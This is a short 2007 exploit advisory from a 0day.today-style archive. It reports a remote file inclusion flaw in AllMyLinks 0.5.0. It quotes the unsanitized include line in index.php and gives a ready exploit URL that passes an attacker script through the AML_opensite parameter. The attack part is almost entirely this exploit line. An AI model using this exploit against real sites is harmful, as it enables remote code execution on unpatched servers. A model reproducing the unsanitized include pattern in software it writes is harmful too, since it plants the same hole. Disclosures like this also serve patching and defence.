id: 1372
date: 01/07/2007
title: AllMyLinks <= 0.5.0 (index.php) Remote File Include Vulnerability
author: GoLd_M
cves: 

=================================================================
AllMyLinks <= 0.5.0 (index.php) Remote File Include Vulnerability
=================================================================




/###################################################################\
#                          AllMyLinks 0.5.0                         #
#    =========================================================      #
#    Published :  2007-01-07                                        #
#    Remote: Yes                                                    #
#####################################################################
#    Author: GolD_M                                                 #
#    =====================================================          #
#    SpeciaL GreeTz : Tryag-Team & 4lKaSrGoLd3n-Team                #
\###################################################################/
In :
/index.php
Line:
/77
Vulnerable Code:
/include("$AML_opensite");
3xpl!T
/index.php?AML_opensite=[Ev!L_Scr!pT]
\#######################################/



#  0day.today [2023-03-22]  #